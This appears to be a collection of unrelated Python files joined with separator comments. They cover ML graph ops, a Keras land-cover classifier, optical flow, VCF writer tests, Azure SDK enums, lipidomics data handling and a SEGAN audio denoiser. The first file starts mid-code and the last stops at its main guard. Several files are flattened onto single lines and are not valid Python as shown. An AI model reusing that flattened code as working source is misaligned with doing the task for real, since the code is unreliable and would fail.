return out_tensor def split(name, out_shape, input, size_splits=None, axis=0, num_split=2, graph=None): if graph is None: graph = get_default_graph() if size_splits is not None: raise NotImplementedError('Split needs to handle size_splits {}' .format(size_splits)) # Instantiate op split_op = SplitOp(name) # Add num_split attribute if not isinstance(num_split, int): raise NotImplementedError('num_split of type {}' .format(type(num_split))) split_op.setNumSplit(num_split) # Add output tensors out_tensors = [] for i in range(num_split): out_name = '{}_out{}'.format(name, i) out_tensors.append(Tensor(out_name, TensorShape(out_shape))) split_op.addOutput(out_tensors[i]) graph.addOp(split_op) # Add inputs (tensor to split, size_splits, axis) graph.addInputToOp(split_op, input) if size_splits is None: # Pass scalar 0 as indicator that split should use num_split # attribute instead of size_splits size_splits_tensor = constant('{}_size_splits'.format(name), out_shape=[], value=0) else: assert isinstance(size_splits, Tensor) size_splits_tensor = size_splits graph.addInputToOp(split_op, size_splits_tensor) if isinstance(axis, int): axis_tensor = constant('{}_axis'.format(name), out_shape=[], value=axis) else: assert isinstance(axis, Tensor) axis_tensor = axis graph.addInputToOp(split_op, axis_tensor) return out_tensors def variable(name, out_shape, graph=None): if graph is None: graph = get_default_graph() var_op = VariableOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) var_op.addOutput(out_tensor) graph.addOp(var_op) return out_tensor
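# A small sketch of how the helpers above compose into a graph. It relies on
# the package's get_default_graph() machinery being importable; the shapes
# below are made up for illustration:
a = placeholder('input', [4, 8])
w = variable('weights', [8, 16])
y = matmul('proj', [4, 16], a, w)
# split the projection into two halves along the feature axis
halves = split('halves', [4, 8], y, num_split=2, axis=1)
print(y, halves)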
# ---------------------------------------------------------------------------
# repo: belovachap/pyvsystems_rewards (1-10 stars)

def format_as_vsys(amount):
    # 1 VSYS == 10**8 atomic units; format an integer amount as a decimal string
    abs_amount = abs(amount)
    whole = abs_amount // 100000000
    fraction = abs_amount % 100000000
    # keep the sign even when the whole part is zero (e.g. -5 atomic units)
    sign = '-' if amount < 0 else ''
    return f'{sign}{whole}.{str(fraction).rjust(8, "0")}'
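# A quick sanity check of the formatter above (illustrative values, not from
# the repo's test suite):
assert format_as_vsys(123456789) == '1.23456789'
# amounts smaller than one whole VSYS keep their sign
assert format_as_vsys(-5) == '-0.00000005'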
# ---------------------------------------------------------------------------
from .connections import get_current_connection
from .connections import use_connection, push_connection, pop_connection
from .connections import Connection
from .queue import Queue, get_failed_queue
from .job import cancel_job, requeue_job
from .worker import Worker
from .version import VERSION

__all__ = [
    'use_connection', 'get_current_connection',
    'push_connection', 'pop_connection', 'Connection',
    'Queue', 'get_failed_queue', 'Worker',
    'cancel_job', 'requeue_job']

__version__ = VERSION
# ---------------------------------------------------------------------------
#!/usr/bin/env python3
#coding=utf-8

# sequences include tuples and lists
t1 = (2, 1.2, 'love', False)  # immutable
l1 = [1, True, 'smile']
print(t1, type(t1))
print(l1, type(l1))

print(t1[:])
print(t1[:1])
print(t1[1:])
print(t1[-1])

print(l1[:])
print(l1[:1])
print(l1[1:])
print(l1[-1])

# a string is a special immutable sequence, so it slices the same way
s = 'bacckd'
print(s[2:4])
# ---------------------------------------------------------------------------
# repo: nicoladimauro/TiSeLaC-ECMLPKDD17

import numpy as np

np.random.seed(1379)

from keras.utils import plot_model
from sklearn.neighbors import BallTree
from sklearn import preprocessing
from sklearn import svm
from sklearn.metrics import confusion_matrix, f1_score, classification_report
from sklearn.model_selection import train_test_split
from sklearn.utils.class_weight import compute_class_weight, compute_sample_weight
from sklearn.linear_model import LogisticRegression as LR
from collections import Counter
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Merge, Activation, Conv1D, MaxPooling1D
from keras.layers.normalization import BatchNormalization
from keras.preprocessing.image import ImageDataGenerator
import keras
from keras import backend as K
from keras.layers.advanced_activations import PReLU, ELU
from keras.optimizers import SGD
from keras import regularizers

import my_callbacks
from models import build_conv_models

### load data
train_coord = np.loadtxt("data/coord_training.txt", delimiter=',')
X_train_ = np.loadtxt('data/training.txt.gz', delimiter=",")
y_train = np.loadtxt("data/training_class.txt")
X_test_ = np.loadtxt('data/test.txt', delimiter=",")
test_coord = np.loadtxt("data/coord_test.txt", delimiter=',')
y_test = np.loadtxt("data/test.cl")

num_classes = 9

### build the complete spatial feature descriptor
kdt = BallTree(train_coord, leaf_size=30, metric='euclidean')

train_neigh = np.empty(shape=(1, 0))
test_neigh = np.empty(shape=(1, 0))

e_X_train = X_train_.reshape(X_train_.shape[0], 23, 10)
e_X_train = np.transpose(e_X_train, (0, 2, 1))
e_X_test = X_test_.reshape(X_test_.shape[0], 23, 10)
e_X_test = np.transpose(e_X_test, (0, 2, 1))

for radius in [1, 3, 5, 7, 9, 11, 13, 15, 17]:
    print('computing ball for radius {}'.format(radius))
    train_neighbors = kdt.query_radius(train_coord, r=radius)
    test_neighbors = kdt.query_radius(test_coord, r=radius)

    neig = []
    for i in range(X_train_.shape[0]):
        mask_ = train_neighbors[i]
        index = np.argwhere(mask_ == i)
        mask = np.delete(mask_, index)
        classes = y_train[mask]
        unique, counts = np.unique(classes, return_counts=True)
        N = [0] * num_classes
        for j in range(len(unique)):
            N[int(unique[j] - 1)] = counts[j]
        if len(mask) < 1:
            N.extend([0., 0., 0., 0., 0., 0.])
        else:
            N_i = e_X_train[mask]
            N.append(np.mean(N_i[:, 7]) + 0.001)
            N.append(np.std(N_i[:, 7]) + 0.001)
            N.append(np.mean(N_i[:, 8]) + 0.001)
            N.append(np.std(N_i[:, 8]) + 0.001)
            N.append(np.mean(N_i[:, 9]) + 0.001)
            N.append(np.std(N_i[:, 9]) + 0.001)
        neig.append(N)
    if (radius == 1):
        train_neigh = np.array(neig)
    else:
        train_neigh = np.concatenate((train_neigh, np.array(neig)), axis=1)

    neig = []
    for i in range(X_test_.shape[0]):
        mask_ = test_neighbors[i]
        index = np.argwhere(mask_ == i)
        mask = np.delete(mask_, index)
        classes = y_train[mask]
        unique, counts = np.unique(classes, return_counts=True)
        N = [0] * num_classes
        for j in range(len(unique)):
            N[int(unique[j] - 1)] = counts[j]
        if len(mask) < 1:
            N.extend([0., 0., 0., 0., 0., 0.])
        else:
            N_i = e_X_train[mask]
            N.append(np.mean(N_i[:, 7]) + 0.001)
            N.append(np.std(N_i[:, 7]) + 0.001)
            N.append(np.mean(N_i[:, 8]) + 0.001)
            N.append(np.std(N_i[:, 8]) + 0.001)
            N.append(np.mean(N_i[:, 9]) + 0.001)
            N.append(np.std(N_i[:, 9]) + 0.001)
        neig.append(N)
    if (radius == 1):
        test_neigh = np.array(neig)
    else:
        test_neigh = np.concatenate((test_neigh, np.array(neig)), axis=1)

train_neigh = np.concatenate((train_neigh, train_coord), axis=1)
test_neigh = np.concatenate((test_neigh, test_coord), axis=1)

X_train_aggr = np.reshape(X_train_, (-1, 10))
X_test_aggr = np.reshape(X_test_, (-1, 10))

### scaling
scaler = preprocessing.StandardScaler().fit(X_train_aggr)
X_train = scaler.transform(X_train_aggr)
X_test = scaler.transform(X_test_aggr)

X_train = np.reshape(X_train, (-1, 230))
X_test = np.reshape(X_test, (-1, 230))

X_train_t = np.reshape(X_train, (X_train.shape[0], 230, 1))
X_test_t = np.reshape(X_test, (X_test.shape[0], 230, 1))

X_train = X_train.reshape(X_train.shape[0], 23, 10)
X_test = X_test.reshape(X_test.shape[0], 23, 10)
input_shape = (23, 10)

scaler = preprocessing.StandardScaler().fit(train_neigh)
X_train_neigh = scaler.transform(train_neigh)
X_test_neigh = scaler.transform(test_neigh)

lb = preprocessing.LabelBinarizer()
lb.fit(y_train)
y_train = lb.transform(y_train)
y_test = lb.transform(y_test)

### spectral model
spectral_model = Sequential()
spectral_model.add(
    Conv1D(filters=32, kernel_size=3, input_shape=input_shape, activation='relu', padding='same'))
spectral_model.add(Conv1D(filters=32, kernel_size=3, activation='relu', padding='same'))
spectral_model.add(Flatten())

ch_models = []
ch_maps = []
input_list = []
n_models = 10
for t in range(n_models):
    map_ch = [i * 10 + t for i in range(23)]
    ch_maps.append(map_ch)

TRAIN = [X_train] + [X_train_t[:, ch_maps[i]] for i in range(n_models)] + [X_train_neigh]
TEST = [X_test] + [X_test_t[:, ch_maps[i]] for i in range(n_models)] + [X_test_neigh]

spectral_model2, layers = build_conv_models(n_models=10, input_shape=(23, 1))

relational_model = Sequential()
relational_model.add(Dense(128, input_shape=(X_train_neigh.shape[1],), activation='relu'))
relational_model.add(Dropout(0.3))
relational_model.add(Dense(64, activation='relu'))
relational_model.add(Dropout(0.3))

complete_model = Sequential()
complete_model.add(Merge([spectral_model, spectral_model2, relational_model], mode='concat'))
complete_model.add(Dense(9, activation='softmax'))

complete_model.compile(loss='categorical_crossentropy',
                       optimizer=keras.optimizers.Adam(),
                       metrics=['accuracy'])

plot_model(complete_model, to_file='model.png', show_shapes=True, show_layer_names=False)

complete_model.fit(TRAIN, y_train, batch_size=32, epochs=7, verbose=1)

print("Train")
y_pred_proba = complete_model.predict(TRAIN)
y_pred = np.argmax(y_pred_proba, axis=1) + 1
y_train_ = np.argmax(y_train, axis=1) + 1
#print(confusion_matrix(y_train_, y_pred))
#print(classification_report(y_train_, y_pred))
print("f1 score micro: ", f1_score(y_train_, y_pred, average='micro'))
print("f1 score macro: ", f1_score(y_train_, y_pred, average='macro'))
print("f1 score weighted: ", f1_score(y_train_, y_pred, average='weighted'))

lr = LR()
lr.fit(y_pred_proba, y_train_)
y_pred = lr.predict(y_pred_proba)
print("Train LR")
#print(confusion_matrix(y_train_, y_pred))
#print(classification_report(y_train_, y_pred))
print("f1 score micro: ", f1_score(y_train_, y_pred, average='micro'))
print("f1 score macro: ", f1_score(y_train_, y_pred, average='macro'))
print("f1 score weighted: ", f1_score(y_train_, y_pred, average='weighted'))

print("Test")
y_pred_proba = complete_model.predict(TEST)
y_pred = np.argmax(y_pred_proba, axis=1) + 1
np.savetxt("baML.txt", y_pred, fmt="%.1f", delimiter="\n")
y_test_ = np.argmax(y_test, axis=1) + 1
#print(confusion_matrix(y_test_, y_pred))
#print(classification_report(y_test_, y_pred))
print("f1 score micro: ", f1_score(y_test_, y_pred, average='micro'))
print("f1 score macro: ", f1_score(y_test_, y_pred, average='macro'))
print("f1 score weighted: ", f1_score(y_test_, y_pred, average='weighted'))

lr = LR()
lr.fit(y_pred_proba, y_test_)
y_pred = lr.predict(y_pred_proba)
print("Test LR")
#print(confusion_matrix(y_test_, y_pred))
#print(classification_report(y_test_, y_pred))
print("f1 score micro: ", f1_score(y_test_, y_pred, average='micro'))
print("f1 score macro: ", f1_score(y_test_, y_pred, average='macro'))
print("f1 score weighted: ", f1_score(y_test_, y_pred, average='weighted'))
# ---------------------------------------------------------------------------
# repo: underworlds-robot/uwds3_core (1-10 stars)
import cv2


class DenseOpticalFlowEstimator(object):
    def __init__(self):
        self.previous_frame = None

    def estimate(self, frame):
        """Return the Farneback dense optical flow between the previous frame and this one."""
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # on the first call there is no previous frame yet, so no flow can be computed
        if self.previous_frame is None:
            self.previous_frame = gray
            return None
        flow = cv2.calcOpticalFlowFarneback(self.previous_frame, gray, None,
                                            0.5, 1, 20, 1, 5, 1.2, 0)
        self.previous_frame = gray
        return flow
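# A minimal usage sketch for the estimator above; "video.mp4" is a
# hypothetical input path:
if __name__ == '__main__':
    estimator = DenseOpticalFlowEstimator()
    cap = cv2.VideoCapture("video.mp4")
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        flow = estimator.estimate(frame)
        if flow is not None:
            # flow has shape (H, W, 2): per-pixel (dx, dy) displacement
            print(flow.shape)
    cap.release()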
# ---------------------------------------------------------------------------
import unittest
from reuse_func import GetData


class InfraTransformer(unittest.TestCase):

    def test_infra_transformer_runningcount(self):
        cal = GetData()
        runningcount = cal.get_runningCount("infra_transformer")
        if runningcount == 0:
            print("infra data transformer running count is 0 after installation")
        else:
            self.assertEqual(0, runningcount, "infra data transformer running count is not 0 after installation")

    def test_infra_transformer_disabledCount(self):
        cal = GetData()
        disabledCount = cal.get_disabledCount("infra_transformer")
        if disabledCount == 0:
            print("infra data transformer disabled count is 0 after installation")
        else:
            self.assertEqual(0, disabledCount, "infra data transformer disabled count is not 0 after installation")

    def test_infra_transformer_invalidCount(self):
        cal = GetData()
        invalidCount = cal.get_invalidCount("infra_transformer")
        if invalidCount == 0:
            print("infra data transformer invalid count is 0 after installation")
        else:
            self.assertEqual(0, invalidCount, "infra data transformer invalid count is not 0 after installation")

    def test_infra_transformer_stoppedCount(self):
        cal = GetData()
        stopped = cal.get_stoppedCount("infra_transformer")
        self.assertNotEqual(0, stopped, "infra data transformer stopped count should not be 0 after installation")
        print("infra data transformer stopped count is " + str(stopped) + " after installation")


if __name__ == '__main__':
    unittest.main()
# ---------------------------------------------------------------------------
# All content Copyright (C) 2018 Genomics plc from io import StringIO import unittest import datetime from wecall.vcfutils.schema import Schema from wecall.vcfutils.writer import encode_VCF_string, VCFWriter class TestVCFWriter(unittest.TestCase): def test_should_write_empty_file_containing_expected_version_number(self): mock_file = StringIO() empty_schema = Schema() writer = VCFWriter(mock_file) writer.write_header(empty_schema) expected_file = '##fileformat=VCFv4.2\n#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_file_metadata_in_expected_format(self): mock_file = StringIO() date = datetime.datetime.utcnow().strftime('%F') schema = Schema() schema.file_metadata['fileDate'] = date writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##fileDate={date!s}\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' \ .format(date=date) self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_info_data_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_info_data('key', '1', 'String', 'sample info field') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##INFO=<ID=key,Number=1,Type=String,Description="sample info field">\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_sample_data_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_sample_data('key', '1', 'String', 'a sample field') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##FORMAT=<ID=key,Number=1,Type=String,Description="a sample field">\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_filter_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_filter('key', 'a filter') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##FILTER=<ID=key,Description="a filter">\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_contig_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_contig('key', 666) writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##contig=<ID=key,length=666>\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_sample_names_in_column_header_line(self): mock_file = StringIO() schema = Schema() schema.samples.append('FOO') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tFOO\n' self.assertEqual(expected_file, mock_file.getvalue()) class TestVCFStringWriting(unittest.TestCase): def test_should_encode_empty_VCF_string(self): self.assertEqual('""', encode_VCF_string('')) def test_should_encode_simple_VCF_string(self): self.assertEqual('"foo"', encode_VCF_string('foo')) def test_should_encode_VCF_string_with_single_double_quote(self): self.assertEqual('"\\""', encode_VCF_string('"')) def test_should_encode_VCF_string_with_single_backslash(self): self.assertEqual('"\\\\"', encode_VCF_string('\\')) def test_should_encode_complex_VCF_string(self): self.assertEqual( 
'"abc\\\\def\\\"ghi"', encode_VCF_string('abc\\def"ghi'))
# ---------------------------------------------------------------------------
# repo: vincenttran-msft/azure-sdk-for-python
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------

from enum import Enum
from six import with_metaclass
from azure.core import CaseInsensitiveEnumMeta


class AuthenticationType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """Specifies the authentication type being used for connecting to the endpoint.
    """

    KEY_BASED = "KeyBased"
    IDENTITY_BASED = "IdentityBased"

class ConnectionPropertiesProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """The provisioning state.
    """

    PENDING = "Pending"
    APPROVED = "Approved"
    REJECTED = "Rejected"
    DISCONNECTED = "Disconnected"

class DigitalTwinsIdentityType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """The type of Managed Identity used by the DigitalTwinsInstance. Only SystemAssigned is
    supported.
    """

    NONE = "None"
    SYSTEM_ASSIGNED = "SystemAssigned"

class EndpointProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """The provisioning state.
    """

    PROVISIONING = "Provisioning"
    DELETING = "Deleting"
    SUCCEEDED = "Succeeded"
    FAILED = "Failed"
    CANCELED = "Canceled"
    DELETED = "Deleted"
    WARNING = "Warning"
    SUSPENDING = "Suspending"
    RESTORING = "Restoring"
    MOVING = "Moving"
    DISABLED = "Disabled"

class EndpointType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """The type of Digital Twins endpoint
    """

    EVENT_HUB = "EventHub"
    EVENT_GRID = "EventGrid"
    SERVICE_BUS = "ServiceBus"

class PrivateLinkServiceConnectionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """The status of a private endpoint connection.
    """

    PENDING = "Pending"
    APPROVED = "Approved"
    REJECTED = "Rejected"
    DISCONNECTED = "Disconnected"

class ProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """The provisioning state.
    """

    PROVISIONING = "Provisioning"
    DELETING = "Deleting"
    UPDATING = "Updating"
    SUCCEEDED = "Succeeded"
    FAILED = "Failed"
    CANCELED = "Canceled"
    DELETED = "Deleted"
    WARNING = "Warning"
    SUSPENDING = "Suspending"
    RESTORING = "Restoring"
    MOVING = "Moving"

class PublicNetworkAccess(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """Public network access for the DigitalTwinsInstance.
    """

    ENABLED = "Enabled"
    DISABLED = "Disabled"

class Reason(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
    """Message providing the reason why the given name is invalid.
    """

    INVALID = "Invalid"
    ALREADY_EXISTS = "AlreadyExists"
# ---------------------------------------------------------------------------
#!/usr/bin/env python # JN 2016-05-17 """ This script runs css-prepare, css-cluster, and css-combine in a row. It does not use multi-processing, and it accepts a single file name only. It is generally better to call the css-* scripts one after the other! """ from __future__ import print_function, absolute_import import os from argparse import ArgumentParser from combinato.cluster.prepare import main as prepare_main from combinato.cluster.cluster import main as cluster_main from combinato.cluster.concatenate import main as combine_main from combinato.cluster.create_groups import main as groups_main def main(): parser = ArgumentParser('Simple script for clustering one datafile', epilog='<NAME> (<EMAIL>)') parser.add_argument('--datafile', nargs=1, required=True) parser.add_argument('--neg', default=False, action='store_true') parser.add_argument('--label', nargs=1, default=['simple']) args = parser.parse_args() sign = 'neg' if args.neg else 'pos' sessions = prepare_main(args.datafile, sign, 'index', 0, None, 20000, args.label[0], False, False) if (sessions) : for name, sign, ses in sessions: cluster_main(name, ses, sign) label = 'sort_{}_{}'.format(sign, args.label[0]) outfname = combine_main(args.datafile[0], [os.path.basename(ses[2]) for ses in sessions], label) groups_main(args.datafile[0], outfname) else : print("No spike sessions to sort.") if __name__ == "__main__": main()
# ---------------------------------------------------------------------------
# Copyright (c) 2019 <NAME> and <NAME> # # This file is part of the LipidFinder software tool and governed by the # 'MIT License'. Please see the LICENSE file that should have been # included as part of this software. """Represent a DataFrame to be processed with LipidFinder's workflow.""" import glob import logging import os import pandas class LFDataFrame(pandas.core.frame.DataFrame): """A LFDataFrame object stores a dataframe to be used as input data in LipidFinder. The input data file(s) must comply with the following requirements: - The format must be: CSV, TSV, XLS or XLSX. For the last two the user can also specify the sheet to be read (or the list of sheets if a folder is given as 'src'). - The first column contains an identifier for each row that is unique throughout every file. - There is one column named as "mzCol" parameter and another one as "rtCol" parameter. - Starting from the column index in "firstSampleIndex" parameter, every intensity column must follow. For instance, for 2 samples with 2 technical replicates, 1 quality control sample and 2 solvents, the columns would be as follows: sample11 , sample12 , sample21 , sample22 , QC1 , sol1, sol2 Ensure that samples with multiple technical replicates are given names in the format name1, name2, etc. such that each name is unique for each column. Replicates should be suffixed 1, 2, etc. Attributes: src (Public[str]) Source path where the data was loaded from. _resolution (Private[int]) Number of digits after the radix point in floats. Examples: LFDataFrame objects can be created in two different ways: >>> from Configuration import LFParameters >>> from LFDataFrame import LFDataFrame >>> params = LFParameters(module='peakfilter') >>> csvData = LFDataFrame('input_data.csv', params) >>> xlsData = LFDataFrame('input_data.xls', params, sheet=2) >>> folderData = LFDataFrame('/home/user/data/', params) After loading the required set of parameters, the data can be loaded from a single file ('csvData' and 'xlsData' examples) or from multiple files located in the same folder ('folderData' example). The latter is meant to be used to merge multiple files split by time ranges that represent a single run. The first and last retention time (RT) minutes of every file are trimmed as they are considered unreliable (except for the first and last minutes of the first and last files, respectively). The method supports overlap (after trimming), and the frames retained will be those from the file with the most frames for each overlapping minute. The number of decimal places to keep from the input m/z column can be changed assigning a value to 'resolution' variable. It has been predefined to 6, a standard value in high-resolution liquid-chromatography coupled to mass-spectrometry. """ def __init__(self, src, parameters, resolution=6, sheet=0): # type: (str, LFParameters, int, object) -> LFDataFrame """Constructor of the class LFDataFrame. 
Keyword Arguments: src -- source path where to load the data from parameters -- LipidFinder's parameters instance (can be for any module) resolution -- number of decimal places to keep from m/z column [default: 6] sheet -- sheet number or list of sheet numbers to read when input file(s) have XLS or XLSX extension (zero-indexed position) [default: 0] """ rtCol = parameters['rtCol'] if (not os.path.isdir(src)): data = self._read_file(src, parameters, sheet) else: # Create a list of the input files in the source folder (in # alphabetical order) fileList = sorted(glob.iglob(os.path.join(src, '*.*'))) if (len(fileList) == 0): raise FileNotFoundError("No files found in '{0}'".format(src)) data = self._read_file(fileList[0], parameters, sheet[0]) if (len(fileList) > 1): # Sort first dataframe by RT data.sort_values([rtCol], inplace=True, kind='mergesort') # Append "minute" column to the dataframe with the # integer part of the float values of its RT column timeCol = 'minute' data = data.assign(minute=data[rtCol].astype(int)) # Since it is the first file, remove the frames # corresponding to the last minute data = data[data[timeCol] != data.iloc[-1][timeCol]] for index, filePath in enumerate(fileList[1:], start=1): chunk = self._read_file(filePath, parameters, sheet[index]) # Sort next chunk dataframe by RT chunk.sort_values([rtCol], inplace=True, kind='mergesort') # Append "minute" column to the dataframe with the # integer part of the float values of its RT column chunk = chunk.assign(minute=chunk[rtCol].astype(int)) # Remove the frames of the first minute chunk = chunk[chunk[timeCol] != chunk.iloc[0][timeCol]] if (index < (len(fileList) - 1)): # Since it is not the last file, remove the # frames corresponding to the last minute chunk = chunk[chunk[timeCol] != chunk.iloc[-1][timeCol]] # Create a dataframe with the number of frames per # minute for both the dataframe and the next chunk overlap = pandas.DataFrame( {'data': data.groupby(timeCol).size(), 'chunk': chunk.groupby(timeCol).size()} ).fillna(0) # Keep the minutes where the number of frames in the # next chunk is higher than in the current dataframe overlap = overlap[overlap['chunk'] > overlap['data']] minutesToReplace = overlap.index.tolist() if (minutesToReplace): # Remove the dataframe frames to be replaced data = data[~data[timeCol].isin(minutesToReplace)] # Append chunk frames preserving the column # order of the main dataframe data = data.append( chunk[chunk[timeCol].isin(minutesToReplace)], ignore_index=True )[data.columns.tolist()] # Drop "minute" column as it will be no longer necessary data.drop(timeCol, axis=1, inplace=True) # Rename first column if no name was given in the input file(s) data.rename(columns={'Unnamed: 0': 'id'}, inplace=True) # Sort dataframe by m/z and RT, and reset the indexing mzCol = parameters['mzCol'] data.sort_values([mzCol, rtCol], inplace=True, kind='mergesort') data.reset_index(drop=True, inplace=True) # Adjust m/z column values to the machine's maximum float # resolution data[mzCol] = data[mzCol].apply(round, ndigits=resolution) super(LFDataFrame, self).__init__(data=data) self.src = src self._resolution = resolution def drop_empty_frames(self, module, parameters, means=False): # type: (str, LFParameters, bool) -> None """Remove empty frames from the dataframe and reset the index. An empty frame is a row for which every sample replicate or sample mean has a zero intensity. 
Keyword Arguments: module -- module name to write in the logging file parameters -- LipidFinder's parameters instance (can be for any module) means -- check sample means instead of each sample replicate? [default: False] """ if (means): meanColIndexes = [i for i, col in enumerate(self.columns) if col.endswith('_mean')] if (parameters['numSolventReps'] > 0): # The first mean column is for the solvents firstIndex = meanColIndexes[1] else: firstIndex = meanColIndexes[0] lastIndex = meanColIndexes[-1] else: firstIndex = parameters['firstSampleIndex'] - 1 lastIndex = firstIndex \ + (parameters['numSamples'] * parameters['numTechReps']) # Get the indices of all empty frames emptyFrames = self.iloc[:, firstIndex : lastIndex].eq(0).all(axis=1) indices = self[emptyFrames].index.tolist() if (indices): # Drop empty frames and reset the index self.drop(module, labels=indices, axis=0, inplace=True) self.reset_index(drop=True, inplace=True) def drop(self, module, **kwargs): # type: (str, ...) -> LFDataFrame """Wrapper of pandas.DataFrame.drop() with logging report. The report will be updated only if the labels correspond to rows, i.e. kwargs['axis'] == 0 (default value). Keyword Arguments: module -- module name to write in the logging file *kwargs -- arguments to pass to pandas.DataFrame.drop() """ # Create logger to print message to the log file logger = logging.getLogger(module) logger.setLevel(logging.INFO) if ((len(kwargs['labels']) > 0) and (kwargs.get('axis', 0) == 0)): idCol = self.columns[0] idList = [str(x) for x in sorted(self.loc[kwargs['labels'], idCol])] logger.info('%s: removed %d rows. IDs: %s', module, len(idList), ','.join(idList)) return super(LFDataFrame, self).drop(**kwargs) @staticmethod def _read_file(src, parameters, sheet): # type: (str, LFParameters, int) -> pandas.core.frame.DataFrame """Return a dataframe with the same content as the source file, but with retention time in minutes. The read function will be configured based on the file's extension. Accepted extensions: CSV, TSV, XLS, XLSX. Keyword Arguments: src -- source file path parameters -- LipidFinder's parameters instance (can be for any module) sheet -- sheet number to read when the input file has XLS or XLSX extension (zero-indexed position) """ extension = os.path.splitext(src)[1].lower()[1:] # Load file based on its extension if (extension == 'csv'): data = pandas.read_csv(src, float_precision='high') elif (extension == 'tsv'): data = pandas.read_csv(src, sep='\t', float_precision='high') elif (extension in ['xls', 'xlsx']): data = pandas.read_excel(src, sheet_name=sheet) else: raise IOError(("Unknown file extension '{0}'. Expected: csv, tsv, " "xls, xlsx").format(extension)) if (('timeUnit' in parameters) and (parameters['timeUnit'] == 'Seconds')): rtCol = parameters['rtCol'] data[rtCol] = data[rtCol].apply(lambda x: round(x / 60.0, 2)) return data
# ---------------------------------------------------------------------------
# repo: BaiYuhaoSpiceeYJ/SEGAN_denoise

import argparse
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from segan.models import *
from segan.datasets import *
import soundfile as sf
from scipy.io import wavfile
from torch.autograd import Variable
import numpy as np
import random
import librosa
import matplotlib
import timeit
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import json
import glob
import os


class ArgParser(object):
    def __init__(self, args):
        for k, v in args.items():
            setattr(self, k, v)


def main(opts):
    assert opts.cfg_file is not None
    assert opts.test_files is not None
    assert opts.g_pretrained_ckpt is not None

    with open(opts.cfg_file, 'r') as cfg_f:
        args = ArgParser(json.load(cfg_f))
        print('Loaded train config: ')
        print(json.dumps(vars(args), indent=2))
    args.cuda = opts.cuda
    if hasattr(args, 'wsegan') and args.wsegan:
        segan = WSEGAN(args)
    else:
        segan = SEGAN(args)
    segan.G.load_pretrained(opts.g_pretrained_ckpt, True)
    if opts.cuda:
        segan.cuda()
    segan.G.eval()
    if opts.h5:
        with h5py.File(opts.test_files[0], 'r') as f:
            twavs = f['data'][:]
    else:
        # process every wav in the test_files
        if len(opts.test_files) == 1:
            # assume we read directory
            twavs = glob.glob(os.path.join(opts.test_files[0], '**/*.wav'),
                              recursive=True)
        else:
            # assume we have list of files in input
            twavs = opts.test_files
    print('Cleaning {} wavs'.format(len(twavs)))
    beg_t = timeit.default_timer()
    for t_i, twav in enumerate(twavs, start=1):
        #print(t_i)
        if not opts.h5:
            #tbname = os.path.basename(twav)
            #rate, wav = wavfile.read(twav)
            wav, rate = librosa.load(twav, sr=8000)
            wav = np.pad(wav, (0, 4096 - len(wav) % 4096), constant_values=0)
            wav = normalize_wave_minmax(wav)
        else:
            tbname = 'tfile_{}.wav'.format(t_i)
            wav = twav
            twav = tbname
        wav = pre_emphasize(wav, args.preemph)
        pwav = torch.FloatTensor(wav).view(1, 1, -1)
        if opts.cuda:
            pwav = pwav.cuda()
        g_wav, g_c = segan.generate(pwav)
        rel_path = os.path.relpath(twav, opts.test_files[0])
        out_path = os.path.join(opts.synthesis_path, rel_path)
        if not os.path.exists(os.path.dirname(out_path)):
            os.makedirs(os.path.dirname(out_path))
        if opts.soundfile:
            sf.write(out_path, g_wav, 8000)
        else:
            #wavfile.write(out_path, 8000, g_wav)
            librosa.output.write_wav(out_path, g_wav, 8000, norm=False)
        end_t = timeit.default_timer()
        print('Cleaned {}/{}: {} in {} s'.format(t_i, len(twavs), twav,
                                                 end_t - beg_t))
        beg_t = timeit.default_timer()


if __name__ == '__main__':
